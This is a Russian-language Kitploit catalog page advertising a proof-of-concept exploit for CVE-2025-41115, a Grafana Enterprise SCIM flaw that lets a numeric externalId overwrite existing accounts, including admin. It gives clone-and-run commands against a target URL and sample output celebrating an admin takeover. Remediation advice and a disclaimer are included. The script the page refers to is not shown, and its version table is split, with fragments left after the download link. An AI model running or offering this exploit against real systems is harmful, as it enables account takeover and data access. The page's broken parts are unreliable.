Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Blackash-CVE-2025-41115 — CVE-2025-41115 | Kitploit
Инструменты/GitHubGitHub/rockmelodies/blackash-cve-2025-41115
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеБезопасность облачных средУправление идентификацией и доступом (IAM)Аутентификация
GitHubrockmelodies/blackash-cve-2025-41115

Blackash-CVE-2025-41115

CVE-2025-41115

Репозиторий
19 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🔐 CVE-2025-41115: Критическое повышение привилегий SCIM в Grafana

218fa54275e0e31c37b4e5091d9112ba_M

Критическая уязвимость повышения привилегий SCIM в Grafana Enterprise


🌟 Краткое описание

CVE-2025-41115 — это критическая (CVSS 10.0) уязвимость в Grafana Enterprise, затрагивающая функцию SCIM-провижининга пользователей.

Когда SCIM-провижининг включен и user_sync_enabled = true, вредоносный SCIM-клиент может отправить числовой externalId, который Grafana ошибочно сопоставляет с внутренним ID пользователя — что позволяет атакующему выдавать себя за существующие учетные записи или перезаписывать их, включая администраторов. ⚠️ Grafana OSS НЕ затронут.


🚨 Влияние

  • 🔓 Захват учетных записей (включая учетные записи администраторов)
  • 🚀 Повышение привилегий с полными правами администратора
  • 🗄️ Доступ к дашбордам / данным / конфигурациям организаций
  • 🌐 Эксплуатируемая по сети с низкими требованиями
  • 🛑 Высокий риск для мультитенантных сред и корпоративных SSO-конфигураций

Условия, необходимые для эксплуатации:

  1. enableSCIM = true
  2. [auth.scim] user_sync_enabled = true

🧩 Затронутые версии

ВерсияСтатус
12.0.0 → 12.2.1❌ Уязвима
12.3.0✅ Исправлена
12.2.1 (исправленная сборка)✅ Исправлена
12.1.3

💡 Управляемые сервисы Grafana (AWS/Azure/Grafana Cloud) были исправлены вендорами.


Как использовать за 3 секунды:

1. Скачивание

root@kitploit:~
sudo git clone https://github.com/B1ack4sh/Blackash-CVE-2025-41115.git

или просто скопируйте и вставьте скрипт выше в файл

2. Сделать исполняемым (необязательно)

root@kitploit:~
chmod +x CVE-2025-41115.py

3. Запуск

root@kitploit:~
python3 CVE-2025-41115.py http://10.10.13.37:3000
# or
python3 CVE-2025-41115.py https://grafana.company.com

Когда эксплойт действительно срабатывает (т.е. цель уязвима и токен действителен), вы увидите вывод, точно похожий на этот: text

root@kitploit:~
[*] CVE-2025-41115 → Targeting http://10.10.13.37:3000
[*] Trying default/leaked tokens + your token...
[+] PWNED with token → glsa_XxXxXxXxXxXxXxXxXxXx...
[+] Login as: [email protected] (any password) → you are now Admin!
[+] Full response: {
  "schemas": [
    "urn:ietf:params:scim:schemas:core:2.0:User"
  ],
  "id": "1",                     ←←← THIS IS THE KEY LINE (UID 1 overwritten)
  "externalId": "1",
  "meta": { ... },
  "userName": "[email protected]",
  "name": {
    "formatted": "Pwned User"
  },
  "emails": [
    {
      "value": "[email protected]",
      "primary": true
    }
  ],
  "active": true
}

🔧 Шаги по устранению

🥇 1. Немедленно обновитесь

Обновитесь до 12.3.0 или одной из исправленных промежуточных версий.

🛠️ 2. Проверьте конфигурацию SCIM

Если вы не используете SCIM-провижининг, убедитесь, что у вас:

root@kitploit:~
enableSCIM = false

или

root@kitploit:~
[auth.scim]
user_sync_enabled = false

📜 3. Журналы аудита

Ищите:

  • Неожиданных новых пользователей
  • Использование числовых externalId
  • Изменения привилегий

🔐 4. Границы доверия

Убедитесь, что только доверенным поставщикам удостоверений разрешено взаимодействовать с вашей SCIM-конечной точкой.

👀 5. Мониторинг эксплуатации

Следите за подозрительными входами, событиями создания пользователей или захватом учетных записей администраторов.


📅 Хронология

  • 📌 2025-11-04 — Проблема обнаружена внутри компании
  • 📌 2025-11-04 — Объявлен инцидент
  • 📌 2025-11-05 — Облачные вендоры уведомлены в частном порядке и исправлены
  • 📌 2025-11-19 — Публичное раскрытие и выпуск официального исправления

📝 Дополнительные примечания

  • 🎯 Ошибка связана именно с тем, что Grafana сопоставляет числовой externalId → внутренний uid.
  • 🟢 Для эксплуатации требуется SCIM с синхронизацией пользователей, поэтому многие развертывания безопасны по умолчанию — но вы должны это подтвердить.
  • ⚡ На момент раскрытия не было подтвержденной эксплуатации в реальных условиях, но оценка CVSS 10 означает, что это чрезвычайно опасно.

Предупреждение об отказе от ответственности!!!

Этот PoC предназначен только для авторизованного тестирования безопасности и образовательных целей в системах, которыми вы владеете или на тестирование которых у вас есть явное письменное разрешение. Несанкционированное использование незаконно и может привести к уголовному преследованию. Автор и распространитель не несут ответственности за неправильное использование. Немедленно установите исправление (≥12.0.6 / 12.3.0+).

Скачать инструмент
✅ Исправлена
12.0.6✅ Исправлена